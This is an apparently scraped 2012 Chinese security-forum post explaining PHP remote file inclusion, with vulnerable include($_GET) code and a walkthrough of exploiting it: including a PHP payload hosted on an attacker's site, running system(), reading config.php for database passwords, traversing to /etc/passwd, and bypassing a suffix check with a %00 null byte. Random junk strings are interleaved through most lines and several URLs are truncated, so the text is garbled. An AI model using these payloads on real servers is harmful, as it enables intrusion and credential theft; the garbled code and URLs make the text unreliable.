中国网络渗透测试联盟

标题: PHP远程包含 [打印本页]
作者: admin    时间: 2012-9-15 14:06
标题: PHP远程包含
# B+ d- N. H1 h% D5 v+ R! [
php远端档包含漏洞基本
" _/ E1 ^; p' ]; {9 ~$ ^& J这篇文章里我会告诉php远程档包含漏洞的原理,初涉程式师的人必看。6 U: v3 m7 _& U" Q4 E' a2 _
本帖隐藏的内容需要回复才可以浏览" n0 {/ K3 t& r" D
首先的问题是,什么才是”远程档包含漏洞“?简要的回答是伺服器通过php的任意档包含过滤不严,从而去执行一个恶意档,这是个程式师过滤上的问题,请记住,所有的cgi程式都有这样的bug。
3 O- B  g, N0 e/ c1.找出bug:# ]; a( s% E4 `7 G& ^  R
为了发现目标,我们首先要知道包含两个字的含义,在所有语言里(大多数)都有这种方法包含任意的档。在php里,我们使用include()函数,它的工作流程:( e3 G8 N5 j6 ]" ]& k& c
如果你在Main.php里包含include1.php,我将这样写include("include1.php").不是很科学,但你要知道其中的道理。
0 m* Y  X- I. f1 z8 f0 l我们先看这个,当用户输入通过后就包含档,也就是* J% b+ E0 u7 [$ @7 T5 u; Z
if ($_GET) {
1 G( h1 r. y' L6 V/ J  g  Hinclude $_GET;( u+ C! m7 }4 [3 k- v' H2 D) o5 r( e
} else {
( e. K4 x- s+ `) T! d7 pinclude "home.php";
! }; ?; b9 z7 Z5 G4 C' c}2 l$ ^  {$ v/ }4 q7 [! A
这种结构在动态网站里是常见的,问题是它允许这样http://www.target.com /explame.php?page=main.php或者http://www.target.com/explame.php? page=downloads.php来查看。无论如何,如果你的程式里有这样的bug也很悲哀了,只能怪你,尽管只是一句过滤的问题,但就是这一句过滤就有了Script hacker.在zone-h.org的调查里,档包含的攻击率占到9.4%,足够我们引起重视,而且它也不是一两天的问题,几年前就有了,但到了今天,一批一批程式师依旧走老路重走,所以就有了这篇文章,在2004年写这样的文章已经老掉牙,但我还是要写,毕竟牢骚能让人收益的时候就不叫牢骚了。
. g7 z" I  k* w/ o. L2.测试6 o" i/ W7 H( t( J, |! h
这里有个远端档包含的例子,目的只有一个,为了你的程式安全,我们来看具体的" ~: Y( E0 G3 ]# b0 `
http://www.target.com/explame.php?page=zizzy
$ T! P3 q+ q8 Z7 E  [4 e* i: s7 N2 cWarning: main(zizzy): failed to open stream: No such file or directory in /var/www/htdocs/index.php on line 37 ~# i6 o2 h4 ~
Warning: main(): Failed opening 'zizzy' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs/index.php on line 3% c# F) ~* W# e' q! `. R
php输出的这些错误资讯告诉我们,程式去包含档/var/www/htdocs/zizzy,但没找到,看见了吧,No such file or directory没这样的档,现在理解了吧。3 N% _) C" z/ ^  t% P% f3 |
3.利用) ~$ p# ?) k4 v" }- ~: x1 [
php确实很好,可以远端调用档,那我创建一个yeah.txt,放在我的站上http://www.mysite.com/yeah.txt.内容这样
" e# G/ e' f, }" Y" H- n; x<?5 i: F; R& y4 |7 v
echo "Wow,test!";) j# G0 U, \; K  \' ?
?>
2 S/ ]" `/ p0 w1 g- A" I那么http://www.target.com/explame.php?pa...e.com/yeah.txt
7 J; X0 M% J& ]# |/ }OK,回显Wow,test!,这样就执行了。读取config.php也不难吧,里面放了mysql密码啊。把yeah.txt写成<? phpinfo; ?>看看,写成system()去试试,有什么感想,在过分点,这样提交page=../../../../.. /../../etc/passwd。知道什么叫真正的包含了吧。
/ ~! N1 f5 S* r# G4.另一种, k' C( w' s, ~, ]4 w4 O
有时程式师换种写法,写成这样,限制了包含范围
9 d* z& Z2 _( P% p" iif ($_GET) {
; Q* d' Y) t1 N6 a% A4 @include "$_GET.php";
8 k4 e0 q) {5 h. O0 ]; C} else {% g/ h8 t# w" l4 W" t* ^8 M( e/ }
include "home.php";
9 y7 P0 n# ]! G0 C}
! |5 L" \9 ^) X# s; J我们提交http://www.target.com/explame.php?pa...e.com/yeah.txt
) i/ b4 V: G6 A: R7 L+ D& O: CWarning: main(http://www.mysite.com/yeah.txt.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var/www/htdocs/explame.php on line 3/ b$ Q$ ?0 P, Q! @/ R
Warning: main(): Failed opening 'http://www.mysite.com/yeah.txt.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/htdocs /explame.php on line 3
8 W1 g4 R0 p5 h; E包含失败了,限制了尾码名为php,那mysite.com的yeah.txt改为yeah.php,ok,照样执行了: V6 p2 L4 X/ H/ g- x4 p! f  c5 f+ P
那passwd怎么办
9 }2 U3 B  `& }; i% y8 n9 oWarning: main(../../../../../../../etc/passwd.php): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /var /www/htdocs/explame.php on line 3
1 r* a. X" N4 M/ E* AWarning: main(): Failed opening '../../../../../../../etc/passwd.php' for inclusion (include_path='.:/usr/local/lib /php') in /var/www/htdocs/explame.php on line 3
2 v$ v4 B7 y" E1 o0 K6 M在这里使用个NUL字元,也就是%00来跳过检测- u2 D- g# U' @
http://www.target.com/explame.php?pa.../etc/passwd%00
- H. z2 q! c" C7 k3 p! l



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2